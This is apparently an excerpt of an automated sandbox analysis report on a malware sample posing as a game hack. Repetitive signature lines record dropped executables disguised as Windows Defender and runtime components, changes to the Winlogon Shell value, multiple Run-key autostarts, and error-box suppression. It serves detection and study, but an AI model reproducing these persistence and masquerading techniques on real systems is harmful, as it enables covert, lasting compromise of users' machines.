                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Creates multiple autostart registry keys
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run runtimesvc
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run runtimesvc
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run runtimesvc
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
